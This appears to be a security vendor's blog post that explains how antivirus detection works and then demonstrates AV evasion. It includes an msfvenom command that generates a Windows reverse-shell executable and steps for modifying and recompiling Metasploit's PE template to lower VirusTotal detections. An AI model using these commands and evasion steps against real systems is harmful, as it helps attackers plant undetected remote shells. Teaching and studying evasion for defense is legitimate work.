
Antivirus software looks for, detects, and eliminates viruses as well as other harmful software such as worms, trojans, adware, and others. Such programs are intended to be used as a preventative measure in cyber security, preventing threats from entering your computer and causing harm. While you may believe that your computer is secure as long as you don’t visit questionable websites, hackers have far more subtle methods of putting their infections on your machines, which is why you need a strong antivirus to keep one step ahead of them. If a virus infects your computer, the repercussions might be grave. Viruses may cause a wide range of harmful behavior. They have the ability to crash your device, spy on you via your webcam, or monitor your personal accounts. Hackers can employ viruses to steal your personal information, which includes everything from account logins to financial information. This can then be used to commit identity theft, phishing schemes, and other crimes. Because of these possible repercussions, network security is more critical than ever.
Antiviruses are created using one of three primary types / techniques.

An antivirus program scans incoming files or code as it travels through your network traffic. Companies that provide this software assemble a large database of previously known viruses and malware and train the software to identify, flag, and remove them. When files, programs, and apps enter and exit your computer, the antivirus compares them to its database in search of matches. Similar or identical matches to the database are separated, scanned, and deleted. While you may configure your antivirus to conduct automated scans of your computer for harmful files, you can also opt-in to manual scans, which allow you to sit back and observe which hazardous files were discovered and neutralized in real-time. Before “cleaning” a file to remove harmful code, some antivirus software will ask for your consent. If you prefer a hands-off approach, you may configure the program to automatically delete dangerous files.
We are going to evade AV with Metasploit Templates. Let’s generate a payload without using any encoding techniques to see how many AV detect it.
We have generated our payload using msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4433 -f exe > /Desktop/virus.exe

Let’s upload the “av.exe” to VirusTotal to test how many AV detect it. The result of Virus total is attached below. We can see that 46 AV were able to detect our msfvenom payload as malicious software:

Let’s make a few changes to the Metasploit payload template.
Step 1: cat /usr/share/metasploit-framework/data/templates/src/pe/exe/template.c

Step 2: Let us change the size of the payload from 4096 to 4000

Step 3: Let us recompile the standard template

Step 4: We are now going to regenerate the payload using the newly compiled template.

Now we are going to re-upload the avbypass2.exe to VirusTotal. By modifying the template, we were able to reduce the detection to 32 AV. By creating custom binaries, we would be able to completely bypass any AV detection.

Based on what and how we alter process codes, we can describe the following evasion approaches as On-disk or In-memory.
Author: Pradeep Chandar






Get through updates and upcoming events, and more directly in your inbox
Platform
Arbis AI
The Hive Pro Platform
Integrations
OT / ICS Security
Compare
vs Rapid7
vs Tenable
vs Qualys
vs Nucleus
Solutions
Attack Surface Mgmt
Multi-Env Scanners
Exposure Assessment
Security Intelligence
Threat Prioritization
Exposure Validation
By Role
CISO
Vulnerability Managers